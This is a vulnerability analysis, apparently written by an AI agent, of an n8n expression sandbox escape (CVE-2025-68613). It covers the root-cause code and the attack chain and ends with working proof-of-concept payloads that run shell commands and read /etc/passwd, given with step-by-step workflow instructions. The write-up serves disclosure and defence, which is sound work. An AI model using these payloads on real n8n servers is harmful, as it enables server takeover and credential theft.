CVE-2025-68613 N8n JavaScript Expression Sandbox Escape Analysis
By Zeroverse AI Agent
Executive Summary#
A critical Remote Code Execution (RCE) vulnerability has been discovered in the server-side expression evaluation engine of the n8n workflow automation platform, tracked as CVE-2025-68613. This vulnerability allows authenticated users (even those with minimal permissions) to execute arbitrary code with n8n process privileges by injecting malicious JavaScript expressions that bypass the intended sandbox.
Since n8n combines AI capabilities with business process automation and has over 400 third-party solution integrations, a successful compromise can impact enterprise environments, enabling attackers to access sensitive information, steal API keys, modify files, and fully control the underlying server. The vulnerability was discovered to be widely exploited around the Christmas period, highlighting the importance of timely assessment, patching, and vulnerability prevention.
Key Findings#
- Root Cause:
thispoints to the global object in VM context, leading to sandbox escape - Attack Complexity: Low - Only requires basic workflow editing permissions
- Attack Impact: Severe - Complete remote code execution
- Scope of Impact: Over 100,000 potentially vulnerable n8n instances globally
Vulnerability Overview#
n8n Workflow Automation Platform#
n8n is an open-source (fair-code licensed) workflow automation platform that allows technical teams to connect applications and services to custom automation processes.
In n8n, workflows are designed as a visual graph of nodes, where each node represents a task, such as:
- Initiating API requests
- Processing or transforming data
- Executing logic or conditions
- Sending messages or writing to databases
n8n combines the simplicity of a low-code/no-code drag-and-drop editor with the flexibility of custom code execution. Users can rely on pre-built integration nodes, or insert JavaScript/Python code when advanced logic is needed.
Scope of Vulnerability Impact#
Vulnerable Versions:
- All n8n versions starting from 0.211.0
- Up to and including 1.120.3
- 1.121.0
- Early versions of 1.122.x (before 1.122.0)
Fixed Versions:
- 1.120.4 - Patch for 1.120.x branch
- 1.121.1 - Patch for 1.121.x branch
- 1.122.0 and later - Fully patched baseline
Technical Background#
n8n Expression System#
1. What is an Expression?#
An expression is JavaScript code that evaluates to a value.
In n8n, expressions are written within {{ }} and execute on the server side.
Example:
{{ 2 + 2 }} Result: 4
n8n executes these expressions on the server, not in the browser.
2. Expressions Can Contain Functions#
JavaScript expressions are not limited to mathematical operations. They can contain immediately executed function calls.
Example:
(function () {
return 10 + 5;
})()
In n8n:
{{ (function () { return 10 + 5 })() }} Result: 15
n8n assumes expressions behave like a safe calculator, but they are actually real JavaScript.
3. JavaScript Functions Have Context (this)#
In JavaScript, every function runs in a context named this.
function showThis() {
return this;
}
console.log(showThis());
Result:
global { process, setTimeout, ... }
n8n expression:
{{ (function () { return this })() }}
n8n output:
{
process: {...},
Buffer: {...},
setTimeout: [Function],
...
}
this is not empty - it exposes the Node.js runtime.
4. Why this is Dangerous on the Server#
Let’s check the type of this:
function check() {
return typeof this;
}
console.log(check());
Result:
object
This means:
thisis not empty- It is a real object
- It contains runtime internals
n8n expression:
{{ (function () { return typeof this })() }}
n8n output:
object
This confirms:
thisexists- It is an object
- It contains runtime data
5. How n8n Evaluates Expressions#
Internally, n8n does something similar to:
function evaluateExpression(expression) {
return eval(expression);
}
evaluateExpression("2 + 2");
Result:
4
n8n equivalent:
{{ 2 + 2 }}
n8n output:
4
eval() executes code with full execution context.
6. this in Evaluating Expressions#
Now let’s combine the two ideas.
Code:
function evaluateExpression(expression) {
return eval(expression);
}
const expr = "(function () { return this })()";
console.log(evaluateExpression(expr));
Result:
global { process, ... }
n8n expression:
{{ (function () { return this })() }}
n8n output:
{
process: {...},
Buffer: {...},
...
}
This is the Core of CVE
Node.js global object exposes:
process(environment variables, execution context)require()(module loading)- Core runtime APIs
Therefore, attacker-controlled expressions can:
- Load Node.js core modules
- Execute operating system-level commands
- Access secrets and credentials
- Modify runtime behavior
Expressions:
- Should be restricted
- Instead inherit Node.js global context
7. n8n Expectation vs Reality#
n8n Expectation:
{{ (function () { return 1 + 1 })() }}
Output:
2
Reality (Unsafe Context):
{{ (function () { return this })() }}
Output:
Node.js global object
The expression has escaped its intended boundaries.
Vulnerability Details#
Root Cause#
The root cause of CVE-2025-68613 is that this points to the global object in VM context, leading to sandbox escape.
Core Vulnerability Code:
File: packages/@n8n/task-runner/src/js-task-runner/js-task-runner.ts
Location: Lines 583-597 (createVmExecutableCode method)
private createVmExecutableCode(code: string) {
return [
// shim for `global` compatibility
'globalThis.global = globalThis', // ⚠️ Vulnerability 1: Leaks global object
// prevent prototype manipulation
'Object.getPrototypeOf = () => ({})',
'Reflect.getPrototypeOf = () => ({})',
'Object.setPrototypeOf = () => false',
'Reflect.setPrototypeOf = () => false',
// wrap user code
`module.exports = async function VmCodeWrapper() {${code}\n}()`, // ⚠️ Vulnerability 2: Function not bound with this
].join('; ');
}
Three Core Defects#
Defect 1: Function Not Bound with this#
`async function VmCodeWrapper() {${code}\n}()`
Problem Analysis:
- User code is wrapped in a function, but the function is called without explicitly binding
this - In Node.js vm module’s
runInContext, when a function is called directly (non-strict mode),thispoints to the global object - Attack payload:
(function(){ return this })()returns the global object
Principle Explanation:
According to JavaScript language specification:
// In non-strict mode
(function(){ return this })() // → Returns global object
// In Node.js vm module's runInContext:
// 1. When VM context is created, globalThis points to this context object
// 2. When function is called directly (non-strict mode), this defaults to pointing to global object
// 3. Therefore, (function(){ return this })() returns VM context's global object
Defect 2: globalThis.global = globalThis#
'globalThis.global = globalThis'
Problem Analysis:
- Assigns VM context’s global object to the
globalproperty - Attackers can access the global object through
global - Combined with Defect 1, attackers can obtain a reference to the global object
Exploitation Example:
// Since globalThis.global = globalThis
// global property directly points to global object
global.process.exit(1);
const fs = global.require('fs');
fs.readFileSync('/etc/passwd');
Defect 3: Invalid Protection in expression.ts#
File: packages/workflow/src/expression.ts
static initializeGlobalContext(data: IDataObject) {
data.this = {}; // ⚠️ Cannot shield JavaScript's this keyword
data.globalThis = {}; // ⚠️ Cannot shield globalThis keyword
...
}
Problem Analysis:
this,globalThis, etc. are JavaScript language keywords and cannot be shielded by setting properties on the data object- When code executes in VM context,
thisstill points to VM context’s global object
Why It’s Invalid:
// ❌ data.this = {} cannot affect this binding when function is called
// When code executes in VM context:
(function(){ return this })() // → Still returns global object, not data.this
// Because:
// 1. data is the context object, contains data.this = {}
// 2. But this during function call is JavaScript language-level binding
// 3. data.this is just a property of the context object, cannot affect function's this binding
Sandbox Protection Mechanism Analysis#
n8n employs a three-layer sandbox protection mechanism, but each layer has defects.
Layer 1: AST-Level Security Check (PrototypeSanitizer)#
File: packages/workflow/src/expression-sandboxing.ts
How It Works:
export const PrototypeSanitizer: ASTAfterHook = (ast, dataNode) => {
astVisit(ast, {
visitMemberExpression(path) {
// Check property names accessed in member expressions
if (!isSafeObjectProperty(node.property.name)) {
throw new ExpressionError(
`Cannot access "${node.property.name}" due to security concerns`,
);
}
},
});
};
Defect:
// ❌ Cannot block function expressions and this keyword
(function(){ return this })() // ← Does not involve member expressions, AST check cannot intercept
this.global // ← this is a keyword, not a property name, AST check cannot intercept
// ✅ Can block:
obj.__proto__ // ← Member expression, can be intercepted
obj.constructor // ← Member expression, can be intercepted
Bypass Methods:
- Use function expressions instead of member expressions to access global object
- Access global object through
thiskeyword
Layer 2: Runtime Context Isolation#
File: packages/workflow/src/expression.ts
How It Works:
static initializeGlobalContext(data: IDataObject) {
// Blocklist: Set to empty objects
data.document = {};
data.global = {};
data.window = {};
data.Window = {};
data.this = {}; // ← Attempts to shield this
data.globalThis = {}; // ← Attempts to shield globalThis
data.self = {};
...
// Allowlist: Set actual objects
data.Date = Date;
data.Object = Object;
data.Array = Array;
...
}
Defect:
// ❌ data.this = {} cannot affect this binding when function is called
// When code executes in VM context:
(function(){ return this })() // → Still returns global object, not data.this
Bypass Methods:
(function(){ return this })()returns VM context’s global object, notdata.this
Layer 3: VM Isolation#
File: packages/@n8n/task-runner/src/js-task-runner/js-task-runner.ts
How It Works:
private createVmExecutableCode(code: string) {
return [
// prevent prototype manipulation
'Object.getPrototypeOf = () => ({})',
'Reflect.getPrototypeOf = () => ({})',
'Object.setPrototypeOf = () => false',
'Reflect.setPrototypeOf = () => false',
// wrap user code
`module.exports = async function VmCodeWrapper() {${code}\n}()`,
].join('; ');
}
Defect:
// ❌ Incomplete prototype method rewriting
'Object.getPrototypeOf = () => ({})', // Only rewrote 4 methods
'Reflect.getPrototypeOf = () => ({})',
'Object.setPrototypeOf = () => false',
'Reflect.setPrototypeOf = () => false',
// Unrewritten methods (could be exploited):
// Object.getOwnPropertyNames
// Object.getOwnPropertyDescriptors
// Object.getOwnPropertySymbols
// Reflect.defineProperty
// etc.
Bypass Methods:
// Directly access global object through this, bypassing prototype method checks
const globalObj = (function(){ return this })();
const keys = Object.getOwnPropertyNames(globalObj); // Enumerate all properties
Exploitation#
Attack Chain#
Step 1: Access#
“Authenticated user creates or edits a workflow”
This means:
- Attackers do not need administrator or system access permissions
- Any user who can create or edit workflows is sufficient
- This includes:
- Low-privileged users
- Shared n8n instances
- Compromised user accounts
- Exposed editors in misconfigured deployments
Why This Matters:
- Workflow editing is considered a legitimate feature
- No exploitation triggered yet - this step is purely normal use
Step 2: Inject#
“Attacker injects a carefully crafted malicious expression into the workflow”
What happens here:
- Attacker inserts a JavaScript expression within
{{ }} - Expression contains executable logic, not normal data processing
- Example payload:
{{ require('child_process').execSync('id') }}
Key Points:
- n8n treats this input as a valid expression
- No validation or sandbox enforcement prevents it
- Payload is now stored as part of the workflow
Step 3: Escape#
“Expression escapes the intended sandbox environment”
This is the core vulnerability.
What Should Happen:
- Expression should only access workflow data
- No access to Node.js internals or system APIs
What Actually Happens:
- Expression executes in unsafe context
- Can access:
require()- Node.js core modules
- Global runtime objects
- JavaScript has escaped its intended sandbox boundaries
Technical Reasons:
- Insufficient isolation of expression execution environment
- Lack of restrictions on module loading and runtime access
Step 4: Execute#
“Execute arbitrary code with n8n process privileges”
Final result:
- Attacker executes OS commands on the server
- Commands run with the same OS user that executes n8n
- Example result:
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
Impact:
- Read/write files
- Access secrets and credentials
- Execute additional payloads
- Potential complete server compromise
POC Code (Proof of Concept)#
POC 1: Access Global Object via this#
// Step 1: Get global object
const globalObj = (function(){ return this })();
// Step 2: Access process object
globalObj.process.exit(1); // Exit process
// Step 3: Access require function
const fs = globalObj.require('fs');
fs.readFileSync('/etc/passwd'); // Read sensitive file
// Step 4: Access Buffer
const buf = globalObj.Buffer.from('secret');
Usage in n8n Workflow:
- Create new workflow
- Add Manual Trigger node
- Add Edit Fields (Set) node
- Configure Set node:
- Field name:
result - Value (expression mode):
{{ (function(){ return this.process.mainModule.require('child_process').execSync('cat /etc/passwd').toString() })() }}
- Field name:
- Execute workflow
- Observe output: Contents of
/etc/passwdfile
POC 2: Access Global Object via global (Simpler)#
// Since globalThis.global = globalThis
// global property directly points to global object
// Step 1: Access process via global
global.process.exit(1);
// Step 2: Access require via global
const fs = global.require('fs');
fs.readFileSync('/etc/passwd');
// Step 3: Access Buffer via global
const buf = global.Buffer.from('secret');
Usage in n8n Workflow:
- Create new workflow
- Add Manual Trigger node
- Add Edit Fields (Set) node
- Configure Set node:
- Field name:
result - Value (expression mode):
{{ global.process.mainModule.require('child_process').execSync('id').toString() }}
- Field name:
- Execute workflow
- Observe output:
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
Complete Call Chain (From Expression Input to RCE)#
1. Workflow trigger
↓
2. Code node receives expression
↓
3. JsTaskRunner.executeTask()
↓
4. validateTaskSettings() - Validate task settings
↓
5. builtInsParser.parseUsedBuiltIns() - Parse used built-in functions
↓
6. requestData() - Request data
↓
7. reconstructTaskData() - Reconstruct task data
↓
8. runForEachItem() or runForAllItems()
↓
9. createDataProxy() - Create data proxy
↓
10. buildContext() - Build VM context
↓
11. createContext() - Create VM context object (from node:vm)
↓
12. createVmExecutableCode() - Wrap user code ⚠️ Vulnerability point 1
↓ Generated code:
'globalThis.global = globalThis;' + ⚠️ Leaks global object
'Object.getPrototypeOf = () => ({});' +
... +
'module.exports = async function VmCodeWrapper() {userCode}()' ⚠️ Function not bound with this
↓
13. runInContext(code, context, options) - Execute code in VM context
↓
14. Execute wrapped code:
- globalThis.global = globalThis ⚠️ Leaks global object to global property
- Rewrite prototype methods
- async function VmCodeWrapper() {userCode}() ⚠️ Execute user code
↓
15. User code execution: (function(){ return this })()
↓
16. When function is called, this points to VM context's global object ⚠️ Core vulnerability
↓
17. Return global object
↓
18. Attacker accesses process, require, Buffer, etc. via global object ⚠️ Exploitable
↓
19. Achieve arbitrary code execution (RCE)
Impact Assessment#
Severity Level#
CVSS v3.1 Score: 9.9 (Critical)
Scoring Details:
- Attack Vector (AV): Network (N)
- Attack Complexity (AC): Low (L)
- Privileges Required (PR): Low (L)
- User Interaction (UI): None (N)
- Scope (S): Unchanged (U)
- Confidentiality Impact (C): High (H)
- Integrity Impact (I): High (H)
- Availability Impact (A): High (H)
Confidentiality#
Attackers who successfully exploit this vulnerability can gain unlimited visibility into data processed and stored by n8n workflows, including:
- API keys, OAuth tokens, database credentials, and service secrets
- Environment variables containing encryption keys and internal access tokens
- Workflow execution logs and historical execution data
- Sensitive business, customer, employee, or patient data transmitted through automation pipelines
Integrity#
Beyond data exposure, attackers can also manipulate the automation logic itself, silently altering how business processes behave:
- Modify legitimate workflows to disrupt operations
- Inject malicious expressions that corrupt or falsify data
- Manipulate workflow outputs fed to downstream systems
- Deploy persistent backdoors within workflows
Availability#
Through arbitrary code execution, attackers can intentionally disrupt or disable automation services:
- Delete or disable critical workflows
- Modify system files causing application instability or crashes
- Cause resource exhaustion through malicious automation loops
- Ransomware attacks demanding payment to restore operations
Real-World Impact#
Scope of Impact:
- Over 103,000 potentially vulnerable n8n instances globally
- Distributed worldwide with varying concentration by region
- Surge in CVE-2025-68613 exploitation detected around the Christmas period
Industry Impact:
- Finance: Compromised transaction automation and compliance reporting
- Healthcare: Unauthorized access to Protected Health Information (PHI), tampering with medical records, suppression of critical alerts, disruption of automated healthcare processes
- Manufacturing: Supply chain automation and production process disruption
- E-commerce: Order processing and customer data exposure
Long-Term Consequences:
- Impact of malicious exploitation leveraging CVE-2025-68613 is difficult to estimate; if attackers deploy backdoors in post-exploitation phases, it may have long-term consequences - potentially discovery of new large-scale data breaches
- Cybercriminals are well aware that organizations have fewer defenses during winter holidays. They often schedule attacks when monitoring is limited and teams are overstretched - such as phishing, ransomware, and data theft